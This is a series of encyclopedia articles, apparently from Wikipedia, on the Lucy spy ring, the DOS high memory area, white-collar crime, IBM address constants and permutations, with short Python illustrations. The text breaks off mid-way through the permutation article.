The record of messages transmitted shows that Roessler had four important sources, codenamed Werther, Teddy, Olga, and Anna.[1] While it was never discovered who they were,[1] the quartet was responsible for 42.5 percent of the intelligence sent from Switzerland to the Soviet Union.[1]
The search for the identity of those sources has created a very large body of work of varying quality, offering various conclusions.[2] Several theories can be dismissed immediately, including the claim, made by Foote and several other writers, that the code names reflected the sources' access type rather than their identity (for example, Werther for Wehrmacht, Olga for Oberkommando der Luftwaffe, Anna for Auswärtiges Amt, the Foreign Office), as the evidence does not support it.[1] Alexander Radó made this claim in his memoirs, which were examined in a Der Spiegel article.[3] Three and a half years before his death, Roessler described the identity of the four sources to a confidant.[1] They were a German major who was in charge of the Abwehr before Wilhelm Canaris, Hans Bernd Gisevius, Carl Goerdeler, and a General Boelitz, who was by then deceased.[1]
The most reliable study, by the CIA Historical Review Program,[1] concluded that of the four sources, the most important was Werther. The study stated he was likely Wehrmacht General Hans Oster, other Abwehr officers working with Swiss intelligence, or Swiss intelligence on its own.[4][1] There was no evidence to link the other three codenames to known individuals.[1] The CIA believed that the German sources gave their reports to the Swiss General Staff, who in turn supplied Roessler with information that the Swiss wanted to pass to the Soviets.[5]
Roessler's story was first published in 1966 by the French journalists Pierre Accoce and Pierre Quet.[6] In 1981, it was alleged by Anthony Read and David Fisher that Lucy was, at its heart, a British Secret Service operation intended to get Ultra information to the Soviets in a convincing way untraceable to British codebreaking operations against the Germans.[7] Stalin had shown considerable suspicion of any information from the British about German plans to invade Russia in 1941, so the Allies needed a way to get helpful information to the Soviets in a form that would not be dismissed as implausible. That the Soviets had, via their own espionage operations, learned of the British break into important German message traffic was not, at the time, known to the British. Various observations have suggested that Allan Foote was more than a mere radio operator: he was in a position to act as a radio interface between SIS and Roessler, and also between Roessler and Moscow; his return to the West in the 1950s was unusual in several ways; and his book was similarly troublesome. Read and Fisher also point out that not one of Roessler's claimed sources in Germany has been identified or has come forward. Hence their suspicion that, even more so than for most espionage operations, the Lucy ring was not what it seemed.
However, this is flatly denied by Harry Hinsley, the official historian for the British secret services in World War II, who stated that "there is no truth in the much-publicized claim that the British authorities made use of the 'Lucy' ring ... to forward intelligence to Moscow".[8]
Phillip Knightley also dismisses the thesis that Ultra was the source of Lucy.[9] He indicates that the information was delivered very promptly to Moscow (often within 24 hours), too fast to have come via GCHQ at Bletchley Park. Further, Ultra intelligence on the Eastern Front was less than complete: many German messages were transmitted by landline, and wireless messages were often too garbled for timely decoding. Furthermore, the Enigma systems employed by German forces on the Eastern Front were only broken intermittently. Knightley suggests that the source was Karel Sedlacek, a Czech military intelligence officer. Sedlacek died in London in 1967 and indicated that he had received the information from one or more unidentified dissidents within the German High Command.[9] Another, but less likely, possibility Knightley suggests is that the information came from the Swiss secret service.[9]
V. E. Tarrant echoes Knightley's objections and in addition points out that Read and Fisher's scenario was unnecessary, as Britain was already passing Ultra information to the Soviet Union following the German invasion in June 1941. While not wishing to reveal Britain's penetration of Enigma, Churchill ordered selected Ultra information to be passed via the British Military Mission in Moscow, reported as coming from "a well-placed source in Berlin" or "a reliable source".[10] However, as the Soviets showed little interest in co-operation on intelligence matters, refusing to share Soviet intelligence that would be useful to Britain (such as information on German air forces on the Eastern Front) or to agree to use the Soviet mission in London as a transmission route, the British cut back the flow of information in the spring of 1942, and by the summer it had dwindled to a trickle. That Britain had lost the motivation to share intelligence with Stalin after this time is also at variance with Read and Fisher's theory.
https://en.wikipedia.org/wiki/Lucy_spy_ring
In DOS memory management, the high memory area (HMA) is the RAM area consisting of the first 65520 bytes above the one-megabyte mark in an IBM AT or compatible computer.
In real mode, the segmentation architecture of the Intel 8086 and subsequent processors identifies memory locations with a 16-bit segment and a 16-bit offset, which is resolved into a physical address via (segment) × 16 + (offset). Although intended to address only 1 megabyte (MB) (2²⁰ bytes) of memory, segment:offset addresses at FFFF:0010 and beyond reference memory beyond 1 MB (FFFF0 + 0010 = 100000). So, on an 80286 and subsequent processors, this mode can actually address the first 65520 bytes of extended memory as part of the 64 KB range starting 16 bytes before the 1 MB mark, FFFF:0000 (0xFFFF0) to FFFF:FFFF (0x10FFEF). The Intel 8086 and 8088 processors, with only 1 MB of memory and only 20 address lines, wrapped around at the 20th bit, so that address FFFF:0010 was equivalent to 0000:0000.[1]
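The segment:offset arithmetic above, and the A20 wraparound it depends on, can be checked with a short sketch (Python used here purely for illustration; the `physical` helper is hypothetical):

```python
# Real-mode address arithmetic for the HMA, as described above.
def physical(segment: int, offset: int, a20_enabled: bool = True) -> int:
    addr = (segment << 4) + offset      # segment * 16 + offset
    if not a20_enabled:
        addr &= 0xFFFFF                 # 8086/8088: wrap at 20 bits
    return addr

# With the A20 line enabled (80286 and later), FFFF:0010 reaches past 1 MB:
assert physical(0xFFFF, 0x0010) == 0x100000
assert physical(0xFFFF, 0xFFFF) == 0x10FFEF   # top of the HMA
# HMA size: 0x10FFEF - 0x100000 + 1 = 65520 bytes
assert physical(0xFFFF, 0xFFFF) - physical(0xFFFF, 0x0010) + 1 == 65520

# On an 8086/8088, the same address wraps around to low memory:
assert physical(0xFFFF, 0x0010, a20_enabled=False) == 0x00000
```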
To allow running existing DOS programs which relied on this feature to access low memory on their newer IBM PC AT computers, IBM added special circuitry on the motherboard to simulate the wrapping around. This circuit was a simple logic gate which could disconnect the microprocessor's 21st addressing line, A20, from the rest of the motherboard. This gate could be controlled, initially through the keyboard controller, to allow running programs which wanted to access the entire RAM.[1]
So-called A20 handlers could control the addressing mode dynamically,[1] thereby allowing programs to load themselves into the 1024–1088 KB region and run in real mode.[1]
Code suitable to be executed in the HMA must either be coded to be position-independent (using only relative references),[2][1] be compiled to work at the specific addresses in the HMA (typically allowing only one or at most two pieces of code to share the HMA), or be designed to be paragraph-boundary or even offset relocatable (with all addresses being fixed up during load).[2][1]
Before code (or data) in the HMA can be addressed by the CPU, the corresponding driver must ensure that the HMA is mapped in. This requires that any such requests are tunneled through a stub remaining in memory outside the HMA, which invokes the A20 handler in order to (temporarily) enable the A20 gate.[2][1] If the driver does not exhibit any public data structures and only uses interrupts or calls already controlled by the underlying operating system, it might be possible to register the driver with the system so that the system takes care of A20 itself, thereby eliminating the need for a separate stub.[1][nb 1]
The first user of the HMA among Microsoft products was Windows/286 2.1 in 1988, which introduced the HIMEM.SYS device driver. Starting in 1990 with Digital Research's DR DOS 5.0[3] (via HIDOS.SYS /BDOS=FFFF[4] and CONFIG.SYS HIDOS=ON) and since 1991 with MS-DOS 5.0[3] (via DOS=HIGH), parts of the operating system's BIOS and kernel could be loaded into the HMA as well,[3][5] freeing up to 46 KB of conventional memory.[1] Other components, such as device drivers and terminate-and-stay-resident programs (TSRs), could at least be loaded into the upper memory area (UMA), but not into the HMA. Under DOS 5.0 and higher, with DOS=HIGH, the system additionally attempted to move the disk buffers into the HMA.[5] Under DR DOS 6.0 (1991) and higher, the disk buffers (via HIBUFFERS, and later also BUFFERSHIGH), parts of the command processor COMMAND.COM as well as several special self-relocating drivers like KEYB, NLSFUNC and SHARE could load into the HMA as well (using their /MH option), thereby freeing up even more conventional and upper memory for conventional DOS software to work with.[1] TASKMAX seems to have relocated parts of itself into the HMA as well.[6][7] Novell's NLCACHE from NetWare Lite and early versions of NWCACHE from Personal NetWare and Novell DOS 7 could utilize the HMA as well.[8][9][7] Under MS-DOS/PC DOS, a ca. 2 KB shared portion of COMMAND.COM can be relocated into the HMA,[10] as well as DISPLAY.SYS bitmaps for prepared codepages.[10][11] Under MS-DOS 6.2 (1993) and higher, a ca. 5 KB portion of DBLSPACE.BIN/DRVSPACE.BIN can coexist with DOS in the HMA (unless DBLSPACE/DRVSPACE /NOHMA is invoked).[5][12] Under PC DOS 7.0 (1995) and 2000, DOSKEY loads into the HMA (if available),[13] and SHARE can be loaded into the HMA as well (unless its /NOHMA option is given).[13] Under MS-DOS 7.0 (1995) to 8.0 (2000), parts of the HMA are also used as a scratchpad to hold a growing data structure recording various properties of the loaded real-mode drivers.[7][14][15]
|
https://en.wikipedia.org/wiki/High_memory_area
|
The term "white-collar crime" refers to financially motivated, nonviolent or non-directly violentcrimecommitted by individuals, businesses and government professionals.[1]The crimes are believed to be committed by middle- or upper-class individuals for financial gains.[2]It was first defined by the sociologistEdwin Sutherlandin 1939 as "a crime committed by a person of respectability and high social status in the course of their occupation".[3]Typical white-collar crimes could includewage theft,fraud,bribery,Ponzi schemes,insider trading,labor racketeering,embezzlement,cybercrime,copyright infringement,money laundering,identity theft, andforgery.[4]White-collar crime overlaps withcorporate crime.
Modern criminology generally prefers to classify the type of crime and the topic:
The types of crime committed are a function of what is available to the potential offender. Thus, those employed in relatively unskilled environments have fewer opportunities to exploit than those who work in situations where large financial transactions occur.[9] Blue-collar crime, such as vandalism or shoplifting, tends to be more obvious and thus attracts more active police attention.[10] In contrast, white-collar employees can blend legitimate and criminal behavior, making themselves less obvious when committing the crime. Blue-collar crime will therefore more often involve physical force, whereas in the corporate world the identification of a victim is less obvious and the issue of reporting is complicated by a culture of commercial confidentiality to protect shareholder value. It is estimated that a great deal of white-collar crime is undetected or, if detected, not reported.
Corporate crime benefits the corporation (company or other type of business organization), rather than individuals. It may, however, result from the decisions of high-ranking individuals within the corporation.[11] Corporations, unlike individuals, are not litigated in criminal courts, which means the term "crime" does not strictly apply.[12] Litigation usually takes place in civil courts or before institutions with jurisdiction over specific types of offences, such as the U.S. Securities and Exchange Commission, which litigates violations of financial market and investment statutes.[13]
State-corporate crime is "illegal or socially injurious actions that occur when one or more institutions of political governance pursue a goal in direct cooperation with one or more institutions of economic production and distribution."[14] Because the negotiation of agreements between a state and a corporation takes place at a relatively senior level on both sides, this is almost exclusively a white-collar "situation" which offers the opportunity for crime. Although law enforcement claims to have prioritized white-collar crime,[15] evidence shows that it continues to be a low priority.[16]
When senior levels of a corporation engage in criminal activity using the company, this is sometimes called control fraud.
Organized transnational crime is organized criminal activity that takes place across national jurisdictions, and with advances in transportation and information technology, law enforcement officials and policymakers have needed to respond to this form of crime on a global scale.[17] Some examples include human trafficking, money laundering, drug smuggling, illegal arms dealing, terrorism, and cybercrime. Although it is impossible to precisely gauge transnational crime, the Millennium Project, an international think tank, assembled statistics on several aspects of transnational crime in 2009:[18]
When a white-collar criminal turns violent, it becomes red-collar crime. This can take the form of killing a witness in a fraud trial to silence them or murdering someone who exposed the fraud, such as a journalist, detective or whistleblower. Perri and Lichtenwald defined red-collar crime as follows:
“This sub-group is referred to as red-collar criminals because they straddle both the white-collar crime arena and, eventually, the violent crime arena. In circumstances where there is the threat of detection, red-collar criminals commit brutal acts of violence to silence the people who have detected their fraud and to prevent further disclosure.”[19]
According to a 2018 report by the Bureau of Labor Statistics, homicide is the third-highest cause of death in the American workplace.[20][21] The Atlantic magazine reported that red-collar criminals often have traits of narcissism and psychopathy, which, ironically, are seen as desirable qualities in the recruitment process, even though they put a company at risk of employing a white-collar criminal.
One investigator,Richard G. Brody, said that the murders might be difficult to detect, being mistaken for accidents or suicides:
“Whenever I read about high-profile executives who are found dead, I immediately think red-collar crime,” he said. “Lots of people are getting away with murder.”
Occupational crime is "any act punishable by law that is committed through opportunity created in the course of an occupation that is legal."[22] Individuals may commit crimes during employment or unemployment. The two most common forms are theft and fraud. Theft can be of varying degrees, from a pencil to furnishings to a car. Insider trading, the trading of stock by someone with access to publicly unavailable information, is a type of fraud.[18]
Crimes related to national interests consist mainly of treason. In the modern world, many nations divide such crimes among several laws. "Crimes Related to Inducement of Foreign Aggression" is the crime of communicating with aliens secretly to cause foreign aggression or menace. "Crimes Related to Foreign Aggression" is the treason of actively cooperating with foreign aggression, regardless of whether it originates inside or outside the nation. "Crimes Related to Insurrection" is internal treason. Depending on the country, criminal conspiracy is added to these. One example is Jho Low, a Malaysian businessman and international fugitive who stole billions of US dollars from 1MDB, a Malaysian sovereign wealth fund.[23]
According to a 2016 American study,[24]
A considerable percentage of white-collar offenders are gainfully employed middle-aged Caucasian men who usually commit their first white-collar offense sometime between their late thirties through their mid-forties and appear to have middle-class backgrounds. Most have some higher education, are married, and have moderate to strong ties to community, family, and religious organizations. White-collar offenders usually have a criminal history, including infractions that span the spectrum of illegality, but many do not overindulge in vice. Recent research examining the five-factor personality trait model determined that white-collar offenders tend to be more neurotic and less agreeable and conscientious than their non-criminal counterparts.
In the United States, sentences for white-collar crimes may include a combination of imprisonment, fines, restitution, community service, disgorgement, probation, or other alternative punishment.[25][26] These punishments grew harsher after the Jeffrey Skilling and Enron scandal, when the Sarbanes–Oxley Act of 2002 was passed by the United States Congress and signed into law by President George W. Bush, defining new crimes and increasing the penalties for crimes such as mail and wire fraud. Punishment for these crimes can be hard to determine because convincing the courts that the offender's conduct was criminal is itself challenging.[27] In other countries, such as China, white-collar criminals can be given the death penalty under aggravating circumstances,[28] yet some countries have a maximum of 10–25 years imprisonment. Certain countries, like Canada, consider the relationship between the parties to be a significant feature of a sentence when there is a breach-of-trust component involved.[29] Questions about sentencing disparity in white-collar crime continue to be debated.[30] The FBI, concerned with identifying this type of offense, collects statistical information on several different fraud offenses (swindles and cons, credit card or ATM fraud, impersonation, welfare fraud, and wire fraud), bribery, counterfeiting and forgery, and embezzlement.[31]
In the United States, the longest sentences for white-collar crimes have included the following: Sholam Weiss (845 years for racketeering, wire fraud and money laundering in connection with the collapse of National Heritage Life Insurance Company); Norman Schmidt and Charles Lewis (330 years and 30 years, respectively, for a "high-yield investment" scheme); Bernard Madoff (150 years for a $65 billion fraud scheme); Frederick Brandau (55 years for a $117 million Ponzi scheme); Martin Sigillito (40 years for a $56 million Ponzi scheme); Eduardo Masferrer (30 years for accounting fraud); Chalana McFarland (30 years for a mortgage fraud scheme); Lance Poulsen (30 years for a $2.9 billion fraud).[32]
From the perspective of an offender, the easiest targets to entrap in "white-collar" crime are those with a certain degree of vulnerability or those with symbolic or emotional value to the offender.[33] Examples of these people can be family members, clients, and close friends who are wrapped up in personal or business proceedings with the offender. Most criminal operations are conducted through a series of particular techniques; in this case, a technique is a certain way to complete a desired task. When one is committing a crime, whether it be shoplifting or tax fraud, it is always easier to successfully complete the task with experience in the technique. Shoplifters who are experienced at stealing in plain sight are much more successful than those who do not know how to steal. The major difference between a shoplifter and someone committing a white-collar crime is that the techniques used are not physical but instead consist of acts like talking on the phone, writing, and entering data.[33]
Often these criminals utilize the "blame game theory", a theory in which certain strategies are utilized by an organization or business and its members in order to strategically shift blame by pushing responsibility to others or denying misconduct.[34]This theory is particularly used in terms of organizations and indicates that offenders often do not take the blame for their actions. Many members of organizations will try to absolve themselves of responsibility when things go wrong.[35]
Forbes Magazine lays out four theories for what leads a criminal to commit a "white collar" crime.[36]The first is that there are poorly designed job incentives for the criminal. Most finance professionals are given a certain type of compensation or reward for short-term mass profits. If a company incentivizes an employee to help commit a crime, such as assisting in a Ponzi Scheme, many employees will partake in order to receive the reward or compensation. Often, this compensation is given in the form of a cash "bonus" on top of their salaries. By doing a task in order to receive a reward, many employees feel as though they are not responsible for the crime, as they have not ordered it. The "blame game theory" comes into play as those being asked to carry out illegal activities feel as though they can place the blame on their bosses instead of themselves. The second theory is that the company's management is very relaxed when it comes to enforcing ethics. If unethical practices are already commonplace in the business, employees will see that as a "green light" to conduct unethical and unlawful business practices to further the business. This idea also ties into Forbes' third theory, that most stock traders see unethical practices as harmless. Many see white-collar crime as a victimless crime, which is not necessarily true. Since many of these stock traders cannot see the victims of their crimes, it seems as if it hurts no one. The last theory is that many firms have unrealistic, large goals. They preach the mentality that employees should "do what it takes".[36]
|
https://en.wikipedia.org/wiki/White-collar_crime
|
In IBM System/360 through present-day z/Architecture, an address constant or "adcon" is an assembly language data type which contains the address of a location in computer memory. An address constant can be one, two, three or four bytes long, although an adcon of fewer than four bytes is conventionally used to hold an expression for a small integer such as a length, a relative address, or an index value, and does not represent an address at all. Address constants are defined using an assembler language "DC" statement.
Other computer systems have similar facilities, although different names may be used.
A-type adcons normally store a four-byte relocatable address; however, it is possible to specify the length of the constant. For example, AL1(stuff) defines a one-byte adcon, useful mainly for small constants with relocatable values. Other adcon types can similarly have a length specification.
V-type adcons store an external reference to be resolved by the link-editor.
Y-type adcons are used for two-byte (halfword) addresses. 'Y' adcons can directly address only up to 32K bytes of storage and are not widely used, since early System/360 assemblers did not support a 'Y' data type. Early DOS/360 and BOS/360 systems made more use of Y adcons, since the machines these systems ran on had limited storage. The notation 'AL2(value)' is now usually used in preference to 'Y(value)' to define a 16-bit value.
Q-type address constants contain not actual addresses but a displacement in the External Dummy Section – similar to the Linux Global Offset Table (see Position-independent code). A J-type adcon is set by the linkage editor to hold the cumulative length of the External Dummy Section, and does not actually contain an address.
Other types of address constants are R, which had special significance for TSS/360 to address the PSECT, and S, which stores an address in base-displacement format – a 16-bit value containing a four-bit general register number and a twelve-bit displacement, the same format in which addresses are encoded in instructions.
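The S-type layout just described (a four-bit base register followed by a twelve-bit displacement) can be modeled in a few lines of Python. The helper names `encode_s_con` and `decode_s_con` are assumptions for illustration only:

```python
def encode_s_con(base_reg, displacement):
    """Pack a base register (0-15) and a displacement (0-4095) into the
    16-bit base-displacement format of an S-type address constant."""
    if not 0 <= base_reg <= 0xF:
        raise ValueError("base register must fit in 4 bits")
    if not 0 <= displacement <= 0xFFF:
        raise ValueError("displacement must fit in 12 bits")
    return (base_reg << 12) | displacement

def decode_s_con(halfword):
    """Split a 16-bit S-con back into (base register, displacement)."""
    return (halfword >> 12) & 0xF, halfword & 0xFFF

# Base register 12, displacement 0x038 packs to 0xC038
print(hex(encode_s_con(12, 0x038)))   # 0xc038
```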
System z supports types AD, JD, QD, and VD, which represent 8-byte (doubleword) versions of types 'A', 'J', 'Q', and 'V' to hold 64-bit addresses.
The nominal value of the 'DC' is a list of expressions enclosed in parentheses. Expressions can be absolute, relocatable, or complex relocatable.
An absolute expression can be completely evaluated at assembly time and does not require further processing by the linkage editor. For example, DC A(4900796) has an absolute nominal value.
A relocatable expression is one that contains one or more terms that require relocation by the linkage editor when the program is linked; for example, in the following code 'ACON' has a relocatable nominal value.
A complex relocatable expression contains terms that relate to addresses in different source modules. For example, DC A(X-Y), where 'X' and 'Y' are in different modules.
All of these are valid adcons:
|
https://en.wikipedia.org/wiki/Address_constant
|
In mathematics, a permutation of a set can mean one of two different things:
An example of the first meaning is the six permutations (orderings) of the set {1, 2, 3}: written as tuples, they are (1, 2, 3), (1, 3, 2), (2, 1, 3), (2, 3, 1), (3, 1, 2), and (3, 2, 1). Anagrams of a word whose letters are all different are also permutations: the letters are already ordered in the original word, and the anagram reorders them. The study of permutations of finite sets is an important topic in combinatorics and group theory.
Permutations are used in almost every branch of mathematics and in many other fields of science. In computer science, they are used for analyzing sorting algorithms; in quantum physics, for describing states of particles; and in biology, for describing RNA sequences.
The number of permutations of n distinct objects is n factorial, usually written as n!, which means the product of all positive integers less than or equal to n.
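The n! count can be checked directly in Python, here against the six orderings of {1, 2, 3} listed earlier:

```python
from itertools import permutations
from math import factorial

elements = [1, 2, 3]
orderings = list(permutations(elements))
print(orderings)   # the six tuples listed above, in lexicographic order
assert len(orderings) == factorial(len(elements)) == 6
```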
According to the second meaning, a permutation of a set S is defined as a bijection from S to itself.[2][3] That is, it is a function from S to S for which every element occurs exactly once as an image value. Such a function σ:S→S{\displaystyle \sigma :S\to S} is equivalent to the rearrangement of the elements of S in which each element i is replaced by the corresponding σ(i){\displaystyle \sigma (i)}. For example, the permutation (3, 1, 2) corresponds to the function σ{\displaystyle \sigma } defined as σ(1)=3,σ(2)=1,σ(3)=2.{\displaystyle \sigma (1)=3,\quad \sigma (2)=1,\quad \sigma (3)=2.} The collection of all permutations of a set forms a group called the symmetric group of the set. The group operation is the composition of functions (performing one rearrangement after the other), which results in another function (rearrangement). The properties of permutations do not depend on the nature of the elements being permuted, only on their number, so one often considers the standard set S={1,2,…,n}{\displaystyle S=\{1,2,\ldots ,n\}}.
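The bijection viewpoint is easy to make concrete: a sketch, representing σ for the permutation (3, 1, 2) as a plain Python dict (an illustrative encoding, not standard library machinery):

```python
# The permutation (3, 1, 2) of {1, 2, 3} as a function sigma, here a dict
sigma = {1: 3, 2: 1, 3: 2}

# sigma is a bijection: every element occurs exactly once as an image value
assert sorted(sigma.values()) == [1, 2, 3]

# The one-line arrangement is recovered by listing sigma(1), sigma(2), sigma(3)
print([sigma[i] for i in (1, 2, 3)])   # [3, 1, 2]
```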
In elementary combinatorics, the k-permutations, or partial permutations, are the ordered arrangements of k distinct elements selected from a set. When k is equal to the size of the set, these are the permutations in the previous sense.
Permutation-like objects called hexagrams were used in China in the I Ching (Pinyin: Yi Jing) as early as 1000 BC.
In Greece, Plutarch wrote that Xenocrates of Chalcedon (396–314 BC) discovered the number of different syllables possible in the Greek language. This would have been the first attempt on record to solve a difficult problem in permutations and combinations.[4]
Al-Khalil (717–786), an Arab mathematician and cryptographer, wrote the Book of Cryptographic Messages. It contains the first use of permutations and combinations, to list all possible Arabic words with and without vowels.[5]
The rule to determine the number of permutations of n objects was known in Indian culture around 1150 AD. The Lilavati by the Indian mathematician Bhāskara II contains a passage that translates as follows:
The product of multiplication of the arithmetical series beginning and increasing by unity and continued to the number of places, will be the variations of number with specific figures.[6]
In 1677, Fabian Stedman described factorials when explaining the number of permutations of bells in change ringing. Starting from two bells: "first, two must be admitted to be varied in two ways", which he illustrates by showing 1 2 and 2 1.[7] He then explains that with three bells there are "three times two figures to be produced out of three" which again is illustrated. His explanation involves "cast away 3, and 1.2 will remain; cast away 2, and 1.3 will remain; cast away 1, and 2.3 will remain".[8] He then moves on to four bells and repeats the casting away argument showing that there will be four different sets of three. Effectively, this is a recursive process. He continues with five bells using the "casting away" method and tabulates the resulting 120 combinations.[9] At this point he gives up and remarks:
Now the nature of these methods is such, that the changes on one number comprehends the changes on all lesser numbers, ... insomuch that a compleat Peal of changes on one number seemeth to be formed by uniting of the compleat Peals on all lesser numbers into one entire body;[10]
Stedman widens the consideration of permutations; he goes on to consider the number of permutations of the letters of the alphabet and of horses from a stable of 20.[11]
A first case in which seemingly unrelated mathematical questions were studied with the help of permutations occurred around 1770, when Joseph Louis Lagrange, in the study of polynomial equations, observed that properties of the permutations of the roots of an equation are related to the possibilities to solve it. This line of work ultimately resulted, through the work of Évariste Galois, in Galois theory, which gives a complete description of what is possible and impossible with respect to solving polynomial equations (in one unknown) by radicals. In modern mathematics, there are many similar situations in which understanding a problem requires studying certain permutations related to it.
The study of permutations as substitutions on n elements led to the notion of the group as an algebraic structure, through the works of Cauchy (1815 memoir).
Permutations played an important role in the cryptanalysis of the Enigma machine, a cipher device used by Nazi Germany during World War II. In particular, one important property of permutations, namely that two permutations are conjugate exactly when they have the same cycle type, was used by cryptologist Marian Rejewski to break the German Enigma cipher at the turn of 1932–1933.[12][13]
In mathematics texts it is customary to denote permutations using lowercase Greek letters. Commonly, either α,β,γ{\displaystyle \alpha ,\beta ,\gamma } or σ,τ,ρ,π{\displaystyle \sigma ,\tau ,\rho ,\pi } are used.[14]
A permutation can be defined as a bijection (an invertible mapping, a one-to-one and onto function) from a set S to itself:
σ:S⟶∼S.{\displaystyle \sigma :S\ {\stackrel {\sim }{\longrightarrow }}\ S.}
The identity permutation is defined by σ(x)=x{\displaystyle \sigma (x)=x} for all elements x∈S{\displaystyle x\in S}, and can be denoted by the number 1{\displaystyle 1},[a] by id=idS{\displaystyle {\text{id}}={\text{id}}_{S}}, or by a single 1-cycle (x).[15][16] The set of all permutations of a set with n elements forms the symmetric group Sn{\displaystyle S_{n}}, where the group operation is composition of functions. Thus for two permutations σ{\displaystyle \sigma } and τ{\displaystyle \tau } in the group Sn{\displaystyle S_{n}}, their product π=στ{\displaystyle \pi =\sigma \tau } is defined by:
π(i)=σ(τ(i)).{\displaystyle \pi (i)=\sigma (\tau (i)).}
Composition is usually written without a dot or other sign. In general, composition of two permutations is not commutative: τσ≠στ.{\displaystyle \tau \sigma \neq \sigma \tau .}
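Non-commutativity already shows up in S₃. A sketch, again representing permutations as dicts and applying the rightmost permutation first (the `compose` helper is an illustrative name, not a library function):

```python
def compose(sigma, tau):
    """Product sigma*tau: apply tau first, then sigma (right-to-left)."""
    return {i: sigma[tau[i]] for i in tau}

sigma = {1: 2, 2: 1, 3: 3}   # the transposition (1 2)
tau   = {1: 1, 2: 3, 3: 2}   # the transposition (2 3)

print(compose(sigma, tau))   # {1: 2, 2: 3, 3: 1}
print(compose(tau, sigma))   # {1: 3, 2: 1, 3: 2}
assert compose(sigma, tau) != compose(tau, sigma)   # not commutative
```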
As a bijection from a set to itself, a permutation is a function that performs a rearrangement of a set, termed an active permutation or substitution. An older viewpoint sees a permutation as an ordered arrangement or list of all the elements of S, called a passive permutation.[17] According to this definition, all permutations in § One-line notation are passive. This meaning is subtly distinct from how passive (i.e. alias) is used in Active and passive transformation and elsewhere,[18][19] which would consider all permutations open to passive interpretation (regardless of whether they are in one-line notation, two-line notation, etc.).
A permutation σ{\displaystyle \sigma } can be decomposed into one or more disjoint cycles, which are the orbits of the cyclic group ⟨σ⟩={1,σ,σ2,…}{\displaystyle \langle \sigma \rangle =\{1,\sigma ,\sigma ^{2},\ldots \}} acting on the set S. A cycle is found by repeatedly applying the permutation to an element: x,σ(x),σ(σ(x)),…,σk−1(x){\displaystyle x,\sigma (x),\sigma (\sigma (x)),\ldots ,\sigma ^{k-1}(x)}, where we assume σk(x)=x{\displaystyle \sigma ^{k}(x)=x}. A cycle consisting of k elements is called a k-cycle. (See § Cycle notation below.)
A fixed point of a permutation σ{\displaystyle \sigma } is an element x which is taken to itself, that is σ(x)=x{\displaystyle \sigma (x)=x}, forming a 1-cycle (x){\displaystyle (\,x\,)}. A permutation with no fixed points is called a derangement. A permutation exchanging two elements (a single 2-cycle) and leaving the others fixed is called a transposition.
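Fixed points and derangements are simple to test for programmatically. A sketch using the dict representation; `fixed_points` and `is_derangement` are hypothetical helper names:

```python
def fixed_points(sigma):
    """Elements x with sigma(x) = x, i.e. the 1-cycles."""
    return [x for x in sigma if sigma[x] == x]

def is_derangement(sigma):
    """A derangement is a permutation with no fixed points."""
    return not fixed_points(sigma)

# The example permutation used later in the article: one-line form 265431
sigma = {1: 2, 2: 6, 3: 5, 4: 4, 5: 3, 6: 1}
print(fixed_points(sigma))        # [4]
assert not is_derangement(sigma)  # 4 is a fixed point

# The transposition (1 2) on {1, 2, 3} fixes 3
assert fixed_points({1: 2, 2: 1, 3: 3}) == [3]
```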
Several notations are widely used to represent permutations conveniently. Cycle notation is a popular choice, as it is compact and shows the permutation's structure clearly. This article uses cycle notation unless otherwise specified.
Cauchy's two-line notation[20][21] lists the elements of S in the first row, and the image of each element below it in the second row. For example, the permutation of S = {1, 2, 3, 4, 5, 6} given by the function
σ(1)=2,σ(2)=6,σ(3)=5,σ(4)=4,σ(5)=3,σ(6)=1{\displaystyle \sigma (1)=2,\ \ \sigma (2)=6,\ \ \sigma (3)=5,\ \ \sigma (4)=4,\ \ \sigma (5)=3,\ \ \sigma (6)=1}
can be written as
The elements of S may appear in any order in the first row, so this permutation could also be written:
If there is a "natural" order for the elements ofS,[b]sayx1,x2,…,xn{\displaystyle x_{1},x_{2},\ldots ,x_{n}}, then one uses this for the first row of the two-line notation:
Under this assumption, one may omit the first row and write the permutation in one-line notation as
that is, as an ordered arrangement of the elements of S.[22][23] Care must be taken to distinguish one-line notation from the cycle notation described below: a common usage is to omit parentheses or other enclosing marks for one-line notation, while using parentheses for cycle notation. The one-line notation is also called the word representation.[24]
The example above would then be:
σ=(123456265431)=265431.{\displaystyle \sigma ={\begin{pmatrix}1&2&3&4&5&6\\2&6&5&4&3&1\end{pmatrix}}=265431.}
(It is typical to use commas to separate these entries only if some have two or more digits.)
This compact form is common in elementary combinatorics and computer science. It is especially useful in applications where the permutations are to be compared as larger or smaller using lexicographic order.
Cycle notation describes the effect of repeatedly applying the permutation on the elements of the set S, with an orbit being called a cycle. The permutation is written as a list of cycles; since distinct cycles involve disjoint sets of elements, this is referred to as "decomposition into disjoint cycles".
To write down the permutation σ{\displaystyle \sigma } in cycle notation, one proceeds as follows:
Also, it is common to omit 1-cycles, since these can be inferred: for any element x in S not appearing in any cycle, one implicitly assumes σ(x)=x{\displaystyle \sigma (x)=x}.[25]
Following the convention of omitting 1-cycles, one may interpret an individual cycle as a permutation which fixes all the elements not in the cycle (a cyclic permutation having only one cycle of length greater than 1). Then the list of disjoint cycles can be seen as the composition of these cyclic permutations. For example, the one-line permutation σ=265431{\displaystyle \sigma =265431} can be written in cycle notation as:
σ=(126)(35)(4)=(126)(35).{\displaystyle \sigma =(126)(35)(4)=(126)(35).}
This may be seen as the composition σ=κ1κ2{\displaystyle \sigma =\kappa _{1}\kappa _{2}} of cyclic permutations:
κ1=(126)=(126)(3)(4)(5),κ2=(35)=(35)(1)(2)(6).{\displaystyle \kappa _{1}=(126)=(126)(3)(4)(5),\quad \kappa _{2}=(35)=(35)(1)(2)(6).}
While permutations in general do not commute, disjoint cycles do; for example:
σ=(126)(35)=(35)(126).{\displaystyle \sigma =(126)(35)=(35)(126).}
Also, each cycle can be rewritten from a different starting point; for example,
σ=(126)(35)=(261)(53).{\displaystyle \sigma =(126)(35)=(261)(53).}
Thus one may write the disjoint cycles of a given permutation in many different ways.
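The decomposition procedure described above is short to implement: follow each element around its orbit until it returns to the start. A sketch on the running example σ = 265431; `disjoint_cycles` is an illustrative name:

```python
def disjoint_cycles(sigma):
    """Decompose a permutation (dict) into disjoint cycles, each cycle
    starting from its smallest not-yet-visited element."""
    seen, cycles = set(), []
    for start in sorted(sigma):
        if start in seen:
            continue
        cycle, x = [], start
        while x not in seen:       # follow the orbit of `start`
            seen.add(x)
            cycle.append(x)
            x = sigma[x]
        cycles.append(tuple(cycle))
    return cycles

# One-line permutation 265431 from the text: sigma(1)=2, sigma(2)=6, ...
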